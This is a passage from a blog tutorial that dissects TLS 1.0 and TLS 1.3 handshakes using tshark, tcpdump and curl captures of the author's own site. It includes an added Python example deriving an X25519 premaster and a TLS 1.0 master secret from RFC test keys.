</div><div><br /></div><div><br /></div><div><div>Above shows a sequence (chain) of 3 certificates. The sender's own certificate comes first. Hence, from top to bottom: the certificate for www.securitynik.com, followed by the intermediate CA (GTS CA 1D4) and the root CA (GTS Root R1). Each certificate certifies the one preceding it: GTS CA 1D4 signed the www.securitynik.com certificate and GTS Root R1 signed GTS CA 1D4. TLS 1.0 requires this ordering. The self-signed root may be omitted from the chain, because the client has to hold it in its own trust store anyway; a client must validate the chain against that store and never trust a root simply because the server sent it.</div><div><br /></div><div>The server must send a Certificate message whenever the agreed key exchange method is not anonymous (recall the DH_anon/ECDH_anon suites in the Client Hello), and it immediately follows the Server Hello. With the ECDHE_RSA suite negotiated here it is mandatory.</div><div><br /></div><div>The certificate provided is generally an X.509v3 certificate. Note, the client may also send a certificate if the server asks for one (certificate_request, handshake type 13); that is not happening here. Also note that up to TLS 1.2 the whole chain crosses the wire in the clear, which is why tshark can print the subject names. That is good for an analyst building detections on certificate fields, and equally good for anyone else watching the link. TLS 1.3 encrypts the Certificate message.</div><div><br /></div><div>Looking at the Server Key Exchange.</div></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Server Key Exchange</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 298</span>
<span style="color: white;"> Handshake Protocol: Server Key Exchange</span>
<span style="color: white;"> Handshake Type: Server Key Exchange (12)</span>
<span style="color: white;"> Length: 294</span>
<span style="color: white;"> 1: EC Diffie-Hellman Server Params</span>
<span style="color: white;"> Curve Type: named_curve (0x03)</span>
<span style="color: white;"> Named Curve: x25519 (0x001d)</span>
<span style="color: white;"> Pubkey Length: 32</span>
<span style="color: white;"> Pubkey: 0aa2761ebf46891226b8005989b2ff16031eb992071eeb39fabc67c84804fc1d</span>
<span style="color: white;"> Signature Length: 256</span>
<span style="color: white;"> Signature: 7a962b3224cbd01508d562d92f8c328c5b2c813b6d2361934d6742fb2eba6e4dc6db02e6…</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>The Server Key Exchange message is sent directly after the server's Certificate message and carries the data the client needs to arrive at the premaster secret. It is sent only when the server certificate does not contain enough data for that. With a plain RSA key exchange (a TLS_RSA_* suite) the client simply encrypts the premaster secret to the certificate's RSA public key, and this message is not sent at all. That is not what happened here: the negotiated suite is TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA, so the certificate's RSA key only authenticates the server while the key exchange is ephemeral Diffie-Hellman, and the server has to send its ephemeral public key. That is why, with an RSA certificate, we see "EC Diffie-Hellman Server Params" rather than anything RSA.</p><p>1: EC Diffie-Hellman Server Params: Curve Type named_curve (3), Named Curve x25519 (0x001d) and a 32-byte public key. (x25519 turning up in a TLS 1.0 handshake is allowed by RFC 8422, which added it to the pre-1.3 versions.) The 256-byte Signature is the server's 2048-bit RSA key (2048 bits = 256 bytes) signing ClientHello.random + ServerHello.random + these curve parameters. That signature is what binds the throwaway key to the certificate and to this specific handshake; without it, anyone in the path could substitute their own parameters. A client must verify it against the certificate it just received.</p><p>The RSA_EXPORT case in RFC 2246, where the server sends a temporary RSA key because its certificate's key is longer than the 512 bits export rules allowed, is a separate and long obsolete reason for sending this message. No export suites were offered above, so it plays no part here; the 2048-bit certificate key is irrelevant to that rule.</p><p>The client will then either use an RSA public key to encrypt the premaster secret, or complete the Diffie-Hellman exchange with the server's public key, "with the result being the premaster secret".</p><p>Closing out, we see the server's flight completed with the "Server Hello Done" message. This message states that the server is done sending messages to support the key exchange. The client can now proceed with its phase of the key exchange process. The server now waits for the client's response.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Server Hello Done</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 4</span>
<span style="color: white;"> Handshake Protocol: Server Hello Done</span>
<span style="color: white;"> 1: Handshake Type: Server Hello Done (14)</span>
<span style="color: white;"> Length: 0</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking at the Client Key Exchange message</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -Y "tls.handshake.type == 16" -V | sed '1,81d'</span>
<span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Client Key Exchange</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 37</span>
<span style="color: white;"> Handshake Protocol: Client Key Exchange</span>
<span style="color: white;"> Handshake Type: Client Key Exchange (16)</span>
<span style="color: white;"> Length: 33</span>
<span style="color: white;"> EC Diffie-Hellman Client Params</span>
<span style="color: white;"> Pubkey Length: 32</span>
<span style="color: white;"> Pubkey: ccdcc7ebb6ce8463f664c562cffd616daeaf23690777570e3a333168473b082d</span>
</pre></div>
</div><div><br /></div><div><div>The Client Key Exchange message is always sent by the client. If RSA key exchange is used, the client generates a 48-byte premaster secret (2 bytes of client version followed by 46 random bytes), encrypts it with the RSA public key from the server's certificate and transmits it here. Only the holder of that private key can recover it, which is exactly the weakness: anyone who later obtains the server's private key, say from a memory dump, can decrypt every captured session that used static RSA.</div><div><br /></div><div>In this example, Diffie-Hellman is being used for the Client Key Exchange, so the message carries only the client's 32-byte x25519 public key and nothing is encrypted to the certificate. Do remember, the server sent its own (signed) Diffie-Hellman public key during its key exchange. Each side combines its private scalar with the other side's public key, and both arrive at the same shared secret without it ever crossing the wire. Because both private scalars are ephemeral and discarded after the handshake, the server's long-term RSA key cannot decrypt this traffic later. This is forward secrecy, and it is why Wireshark cannot decrypt an ECDHE session from just the server's private key; you need the session secrets, for example via an SSLKEYLOGFILE written by the client.</div><div><br /></div><div>The size of the premaster secret varies with the key exchange algorithm: 48 bytes for RSA, and for (EC) Diffie-Hellman the shared secret itself (32 bytes for x25519). Either way it is run through the TLS PRF together with the two hello randoms to produce the master secret, which is always 48 bytes in length. The master secret is then expanded into the MAC keys, encryption keys and IVs for each direction.</div><div><br /></div><div>The client also sends its <i>Change Cipher Spec </i>message. This is content type 20, not a handshake message, and it tells the server that everything the client sends from here on is protected with the newly negotiated keys.</div></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> TLSv1 Record Layer: Change Cipher Spec Protocol: Change Cipher Spec</span>
<span style="color: white;"> Content Type: Change Cipher Spec (20)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 1</span>
<span style="color: white;"> Change Cipher Spec Message</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
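<p>The key agreement described above under the Client Key Exchange (each side combines its own private value with the other side's public key, and the resulting premaster secret is expanded into a 48-byte master secret) carried through in an added Python example. This is not code from the original post: X25519 and the TLS 1.0 PRF are implemented here directly from RFC 7748 and RFC 2246, the two private scalars are the RFC 7748 section 6.1 test keys standing in for the unknown ones in the capture, and the hello randoms are the ones from the dumps above.</p>

```python
"""ECDHE premaster agreement (X25519) and the TLS 1.0 master-secret derivation.
Added example for this post, not the page's code. The two private scalars are the
RFC 7748 section 6.1 test keys, used here as constructed inputs (the capture's
private keys are unknown); the hello randoms are copied from the dumps above."""
import hashlib
import hmac

P = 2 ** 255 - 19
BASEPOINT = (9).to_bytes(32, "little")
CLIENT_RANDOM = bytes.fromhex("d21450dca6d7d0a53270853149ffa3bd2e6004eecaa7a50666386b6ccc26c817")
SERVER_RANDOM = bytes.fromhex("64b57bddd6dd95316e80d2d04a66ffcebb3f853e885b61d4444f574e47524400")
CLIENT_PRIV = bytes.fromhex("77076d0a7318a57d3c16c17251b26645df4c2f87ebc0992ab177fba51db92c2a")  # RFC 7748 "Alice"
SERVER_PRIV = bytes.fromhex("5dab087e624a8a4b79e17f8b83800ee66f3bb1292618b6fd1c2f8b27ff88e0eb")  # RFC 7748 "Bob"


def x25519(scalar, u):
    """RFC 7748 X25519: clamped 32-byte scalar times the Montgomery u-coordinate u (32 bytes)."""
    k = bytearray(scalar)
    k[0] &= 248
    k[31] = (k[31] & 127) | 64
    k = int.from_bytes(k, "little")
    x1 = int.from_bytes(bytes(u[:31]) + bytes([u[31] & 127]), "little")
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):  # Montgomery ladder, one step per scalar bit
        kt = (k >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        da, cb = d * a % P, c * b % P
        x3, z3 = (da + cb) ** 2 % P, x1 * ((da - cb) ** 2) % P
        x2, z2 = aa * bb % P, e * (aa + 121665 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def _p_hash(algo, secret, seed, n):
    """P_hash from RFC 2246 section 5: HMAC(secret, A(i) + seed) concatenated, A(i) = HMAC(secret, A(i-1))."""
    out, a = b"", seed
    while len(out) < n:
        a = hmac.new(secret, a, algo).digest()
        out += hmac.new(secret, a + seed, algo).digest()
    return out[:n]


def tls10_prf(secret, label, seed, n):
    """TLS 1.0 PRF: P_MD5 over the first half of the secret XOR P_SHA1 over the second half."""
    half = (len(secret) + 1) // 2  # the halves share the middle byte when the length is odd
    s1, s2 = secret[:half], secret[-half:]
    return bytes(x ^ y for x, y in zip(_p_hash("md5", s1, label + seed, n),
                                       _p_hash("sha1", s2, label + seed, n)))


def master_secret(premaster, client_random, server_random):
    """master_secret = PRF(pre_master_secret, "master secret", ClientHello.random + ServerHello.random)[0..47]"""
    return tls10_prf(premaster, b"master secret", client_random + server_random, 48)


def ecdhe_handshake(client_priv, server_priv, client_random, server_random):
    """Both sides of the ECDHE step: only the two public keys cross the wire, the premaster never does."""
    server_pub = x25519(server_priv, BASEPOINT)  # Server Key Exchange 'Pubkey' (signed by the RSA cert key)
    client_pub = x25519(client_priv, BASEPOINT)  # Client Key Exchange 'Pubkey'
    premaster_client = x25519(client_priv, server_pub)  # for X25519 the premaster is the 32-byte X25519 output
    premaster_server = x25519(server_priv, client_pub)
    return {
        "server_pub": server_pub, "client_pub": client_pub,
        "premaster_client": premaster_client, "premaster_server": premaster_server,
        "master_client": master_secret(premaster_client, client_random, server_random),
        "master_server": master_secret(premaster_server, client_random, server_random),
    }


if __name__ == "__main__":
    hs = ecdhe_handshake(CLIENT_PRIV, SERVER_PRIV, CLIENT_RANDOM, SERVER_RANDOM)
    print("premaster agree:", hs["premaster_client"] == hs["premaster_server"], hs["premaster_client"].hex())
    print("master secret (%d bytes):" % len(hs["master_client"]), hs["master_client"].hex())
```

<p>Run it and both sides print the same 32-byte premaster and the same 48-byte master secret; change one scalar and they diverge. Notice what is absent from the derivation: the server's RSA private key is never used, which is the forward-secrecy point. Knowing the two randoms and both public keys from the capture gets an observer nowhere, and the only way to decrypt the session afterwards is to have logged the master secret (or premaster) while the connection was alive. The PRF is also what the 12-byte Finished verify_data later comes out of, with the label "client finished" or "server finished" and a hash of the handshake messages as the seed.</p>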
<p></p><p>After the Change Cipher Spec, a Finished message is sent. It carries 12 bytes of verify_data, a PRF of the master secret over a hash of every handshake message exchanged so far, so it verifies that the key exchange and authentication succeeded and that nobody tampered with the earlier, unprotected messages (a stripped cipher suite or an altered extension shows up here as a mismatch and the handshake fails). It is the first message protected with the negotiated algorithms, keys and secrets, which is why tshark can only label it "Encrypted Handshake Message"; with the session keys loaded it would decode as Finished (20). The Length of 48 is the CBC record: 4 bytes of handshake header, 12 bytes of verify_data and a 20-byte HMAC-SHA1 make 36, padded up to the next 16-byte AES block. Once a peer has sent its <i>Finished</i> message and received and validated the <i>Finished </i>message from its peer, it may begin to send and receive application data over this connection. </p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Encrypted Handshake Message</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 48</span>
<span style="color: white;"> Handshake Protocol: Encrypted Handshake Message</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Wrapping this up by looking at the server's Change Cipher Spec and Finished messages.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -Y "(tls.record.content_type == 20) && (tcp.srcport == 443)" -V | sed '1,81d' </span>
<span style="color: white;">Transport Layer Security </span>
<span style="color: white;"> TLSv1 Record Layer: Change Cipher Spec Protocol: Change Cipher Spec </span>
<span style="color: white;"> Content Type: Change Cipher Spec (20) </span>
<span style="color: white;"> Version: TLS 1.0 (0x0301) </span>
<span style="color: white;"> Length: 1 </span>
<span style="color: white;"> Change Cipher Spec Message </span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Encrypted Handshake Message </span>
<span style="color: white;"> Content Type: Handshake (22) </span>
<span style="color: white;"> Version: TLS 1.0 (0x0301) </span>
<span style="color: white;"> Length: 48 </span>
<span style="color: white;"> Handshake Protocol: Encrypted Handshake Message </span>
</pre></div>
</div><div><br /></div><p>Finally, we see the application data is encrypted. Note, while the payload itself is opaque, tshark still labels it as HTTP/2. It is not looking inside the ciphertext: the server accepted "h2" in the ALPN extension of its Server Hello, which is sent in the clear, and the dissector carries that label forward onto every application data record. ALPN, SNI and the chosen cipher suite are the kind of plaintext handshake metadata that let you classify encrypted traffic without decrypting any of it.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -Y "((tls.record.content_type == 23) && (tls.record.length == 64)) && (tcp.srcport == 443)" -V | sed '1,81d' </span>
<span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1 Record Layer: Application Data Protocol: HyperText Transfer Protocol 2</span>
<span style="color: white;"> Content Type: Application Data (23)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 64</span>
<span style="color: white;"> Encrypted Application Data: b35dacf71de0fa03a23a0bdea81200463de633f3efe3985b99ba80c38e0d901addba430a…</span>
<span style="color: white;"> [Application Data Protocol: HyperText Transfer Protocol 2]</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Here is that full sequence of packets.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -c 15</span>
<span style="color: white;"> 1 0.000000 10.0.1.128 → 142.251.32.83 TCP 74 41570 → 443 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=971727410 TSecr=0 WS=128</span>
<span style="color: white;"> 2 0.014645 142.251.32.83 → 10.0.1.128 TCP 60 443 → 41570 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460</span>
<span style="color: white;"> 3 0.014733 10.0.1.128 → 142.251.32.83 TCP 54 41570 → 443 [ACK] Seq=1 Ack=1 Win=64240 Len=0</span>
<span style="color: white;"> 4 0.019859 10.0.1.128 → 142.251.32.83 TLSv1 236 Client Hello</span>
<span style="color: white;"> 5 0.020277 142.251.32.83 → 10.0.1.128 TCP 60 443 → 41570 [ACK] Seq=1 Ack=183 Win=64240 Len=0</span>
<span style="color: white;"> 6 0.069372 142.251.32.83 → 10.0.1.128 TLSv1 1466 Server Hello</span>
<span style="color: white;"> 7 0.069395 10.0.1.128 → 142.251.32.83 TCP 54 41570 → 443 [ACK] Seq=183 Ack=1413 Win=63540 Len=0</span>
<span style="color: white;"> 8 0.069978 142.251.32.83 → 10.0.1.128 TCP 2878 443 → 41570 [PSH, ACK] Seq=1413 Ack=183 Win=64240 Len=2824 [TCP segment of a reassembled PDU]</span>
<span style="color: white;"> 9 0.069993 10.0.1.128 → 142.251.32.83 TCP 54 41570 → 443 [ACK] Seq=183 Ack=4237 Win=61320 Len=0</span>
<span style="color: white;"> 10 0.070291 142.251.32.83 → 10.0.1.128 TLSv1 452 Certificate, Server Key Exchange, Server Hello Done</span>
<span style="color: white;"> 11 0.070300 10.0.1.128 → 142.251.32.83 TCP 54 41570 → 443 [ACK] Seq=183 Ack=4635 Win=61320 Len=0</span>
<span style="color: white;"> 12 0.082053 10.0.1.128 → 142.251.32.83 TLSv1 155 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message</span>
<span style="color: white;"> 13 0.082396 142.251.32.83 → 10.0.1.128 TCP 60 443 → 41570 [ACK] Seq=4635 Ack=284 Win=64240 Len=0</span>
<span style="color: white;"> 14 0.122781 142.251.32.83 → 10.0.1.128 TLSv1 113 Change Cipher Spec, Encrypted Handshake Message</span>
<span style="color: white;"> 15 0.122974 142.251.32.83 → 10.0.1.128 TLSv1 123 Application Data</span>
</pre></div>
</div><div><br /></div><div>With that understanding in place, time to move to TLSv1.3.</div><div><br /><div><b><span style="font-size: medium;"><br />TLS 1.3</span></b> </div><div>Defined in RFC 8446 (August 2018).</div><div><br /></div><div>TLS 1.3 is a major revision of the TLS protocol. While it has significant changes, the basic capabilities of the previous TLS versions have been retained.</div><div><br /></div><div>Some key objectives of TLS 1.3 are:</div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Remove unused and unsafe features of older TLS versions</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Include strong security analysis in the design</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Improve privacy by encrypting more of the protocol</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Reduce the time needed to complete the handshake (one round trip for a full handshake, zero for 0-RTT resumption)</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* All handshake messages after the Server Hello are now encrypted, the Certificate included. Server extensions that used to travel in the clear in the Server Hello are now carried in the <i>EncryptedExtensions </i>message. </span></div><div><br /></div><div>TLS 1.3 also has a new set of cipher suites that are exclusive to it. These cipher suites are based on Authenticated Encryption with Associated Data (AEAD), and the suite name now covers only the AEAD cipher and the hash used by the key schedule (for example TLS_AES_256_GCM_SHA384). Key exchange and authentication are negotiated separately through extensions rather than being baked into the suite name as in TLS 1.0.</div><div><br /></div><div>With the exception of the messages needed to establish a shared secret, the TLS handshake is encrypted.</div><div><br /></div><div>Additionally, renegotiation, generic data compression, Digital Signature Algorithm (DSA) certificates, static RSA key exchange and key exchange with custom Diffie-Hellman (DH) groups have all been removed. 
TLS 1.3 therefore provides forward secrecy by default: with static RSA gone, every certificate-authenticated handshake uses an ephemeral (EC)DHE exchange, so a server private key that leaks later does not decrypt past captures.</div><div><br /></div><div>The TLS 1.3 handshake should be looked at as having 3 phases.</div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>1. Key Exchange</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>Selection of cryptographic parameters and establishment of a shared key.</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>2. Server Parameters</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>Establish other handshake parameters such as application layer protocol support, whether the client should be authenticated, etc. This phase is encrypted.</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>3. Authentication</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>Authenticate the server and optionally the client, provide key confirmation and handshake integrity. This phase is also encrypted.</span></div><div><br /></div><div><br /></div><div>Capture TLSv1.3 traffic, filtering on the host so the pcap holds only this session. </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tcpdump -n -w securitynik_tls1.3.pcap 'tcp port 443 and host www.securitynik.com' -v</span>
<span style="color: white;">tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span style="color: white;">q^C142 packets captured</span>
<span style="color: white;">148 packets received by filter</span>
<span style="color: white;">0 packets dropped by kernel</span>
</pre></div>
</div><div><br /></div><div><div>A current <i>curl</i> negotiates TLS 1.3 by default whenever the server supports it, but let's still force it with <i>--tlsv1.3 --tls-max 1.3</i> so that nothing else can be negotiated and the capture contains only a TLS 1.3 handshake.</div></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ curl --verbose https://www.securitynik.com --tlsv1.3 --tls-max 1.3 | more </span>
<span style="color: white;"> % Total % Received % Xferd Average Speed Time Time Time Current</span>
<span style="color: white;"> Dload Upload Total Spent Left Speed</span>
<span style="color: white;"> 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 142.251.32.83:443...</span>
<span style="color: white;">* Connected to www.securitynik.com (142.251.32.83) port 443 (#0)</span>
<span style="color: white;">* ALPN: offers h2,http/1.1</span>
<span style="color: white;">} [5 bytes data]</span>
<span style="color: white;">* TLSv1.3 (OUT), TLS handshake, Client hello (1):</span>
<span style="color: white;">} [512 bytes data]</span>
<span style="color: white;">* CAfile: /etc/ssl/certs/ca-certificates.crt</span>
<span style="color: white;">* CApath: /etc/ssl/certs</span>
<span style="color: white;">{ [5 bytes data]</span>
<span style="color: white;">* TLSv1.3 (IN), TLS handshake, Server hello (2):</span>
<span style="color: white;">{ [122 bytes data]</span>
<span style="color: white;">* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):</span>
<span style="color: white;">{ [15 bytes data]</span>
<span style="color: white;">* TLSv1.3 (IN), TLS handshake, Certificate (11):</span>
<span style="color: white;">{ [4219 bytes data]</span>
<span style="color: white;">* TLSv1.3 (IN), TLS handshake, CERT verify (15):</span>
<span style="color: white;">{ [264 bytes data]</span>
<span style="color: white;">* TLSv1.3 (IN), TLS handshake, Finished (20):</span>
<span style="color: white;">{ [52 bytes data]</span>
<span style="color: white;">* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):</span>
<span style="color: white;">} [1 bytes data]</span>
<span style="color: white;">* TLSv1.3 (OUT), TLS handshake, Finished (20):</span>
<span style="color: white;">} [52 bytes data]</span>
<span style="color: white;">* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384</span>
<span style="color: white;">* ALPN: server accepted h2</span>
<span style="color: white;">* Server certificate:</span>
<span style="color: white;">* subject: CN=www.securitynik.com</span>
<span style="color: white;">* start date: May 30 04:44:46 2023 GMT</span>
<span style="color: white;">* expire date: Aug 28 05:31:35 2023 GMT</span>
<span style="color: white;">* subjectAltName: host "www.securitynik.com" matched cert's "www.securitynik.com"</span>
<span style="color: white;">* issuer: C=US; O=Google Trust Services LLC; CN=GTS CA 1D4</span>
<span style="color: white;">* SSL certificate verify ok.</span>
<span style="color: white;">} [5 bytes data]</span>
<span style="color: white;">* using HTTP/2</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>As we dig into TLS 1.3, we will not review every field, but will try to identify the differences from TLS 1.0 while learning about 1.3. We already know the 3-way handshake has to be completed, so no need for us to repeat that step.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.3.pcap -Y "tls.handshake.type == 1" -V | sed '1,81d;221,$d' </span>
<span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Client Hello</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> 1: Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 512</span>
<span style="color: white;"> Handshake Protocol: Client Hello</span>
<span style="color: white;"> Handshake Type: Client Hello (1)</span>
<span style="color: white;"> Length: 508</span>
<span style="color: white;"> 2: Version: TLS 1.2 (0x0303)</span>
<span style="color: white;"> Random: 7c818caebba31899f0cfa4b428d9cb77472cc14adcc6754f112154a448ce789f</span>
<span style="color: white;"> GMT Unix Time: Mar 11, 2036 12:15:42.000000000 EDT</span>
<span style="color: white;"> 3: Random Bytes: bba31899f0cfa4b428d9cb77472cc14adcc6754f112154a448ce789f</span>
<span style="color: white;"> Session ID Length: 32</span>
<span style="color: white;"> 4: Session ID: edb77086c25eb6bd211601cbbda8a316018082c8c67f02e9738e40226e2c4f30</span>
<span style="color: white;"> Cipher Suites Length: 8</span>
<span style="color: white;"> 5: Cipher Suites (4 suites)</span>
<span style="color: white;"> Cipher Suite: TLS_AES_256_GCM_SHA384 (0x1302)</span>
<span style="color: white;"> Cipher Suite: TLS_CHACHA20_POLY1305_SHA256 (0x1303)</span>
<span style="color: white;"> Cipher Suite: TLS_AES_128_GCM_SHA256 (0x1301)</span>
<span style="color: white;"> Cipher Suite: TLS_EMPTY_RENEGOTIATION_INFO_SCSV (0x00ff)</span>
<span style="color: white;"> 6: Compression Methods Length: 1</span>
<span style="color: white;"> Compression Methods (1 method)</span>
<span style="color: white;"> Compression Method: null (0)</span>
<span style="color: white;"> 7: Extensions Length: 427</span>
<span style="color: white;"> ... </span>
<span style="color: white;"> 8: Extension: supported_groups (len=22)</span>
<span style="color: white;"> Type: supported_groups (10)</span>
<span style="color: white;"> Length: 22</span>
<span style="color: white;"> Supported Groups List Length: 20</span>
<span style="color: white;"> Supported Groups (10 groups)</span>
<span style="color: white;"> Supported Group: x25519 (0x001d)</span>
<span style="color: white;"> Supported Group: secp256r1 (0x0017)</span>
<span style="color: white;"> Supported Group: x448 (0x001e)</span>
<span style="color: white;"> ...</span>
<span style="color: white;"> 9: Extension: signature_algorithms (len=30)</span>
<span style="color: white;"> Type: signature_algorithms (13)</span>
<span style="color: white;"> Length: 30</span>
<span style="color: white;"> Signature Hash Algorithms Length: 28</span>
<span style="color: white;"> Signature Hash Algorithms (14 algorithms)</span>
<span style="color: white;"> Signature Algorithm: ecdsa_secp256r1_sha256 (0x0403)</span>
<span style="color: white;"> Signature Hash Algorithm Hash: SHA256 (4)</span>
<span style="color: white;"> Signature Hash Algorithm Signature: ECDSA (3)</span>
<span style="color: white;"> Signature Algorithm: ecdsa_secp384r1_sha384 (0x0503)</span>
<span style="color: white;"> Signature Hash Algorithm Hash: SHA384 (5)</span>
<span style="color: white;"> Signature Hash Algorithm Signature: ECDSA (3)</span>
<span style="color: white;"> Signature Algorithm: ecdsa_secp521r1_sha512 (0x0603)</span>
<span style="color: white;"> Signature Hash Algorithm Hash: SHA512 (6)</span>
<span style="color: white;"> Signature Hash Algorithm Signature: ECDSA (3)</span>
<span style="color: white;"> ...</span>
<span style="color: white;"> 10: Extension: supported_versions (len=3)</span>
<span style="color: white;"> Type: supported_versions (43)</span>
<span style="color: white;"> Length: 3</span>
<span style="color: white;"> Supported Versions length: 2</span>
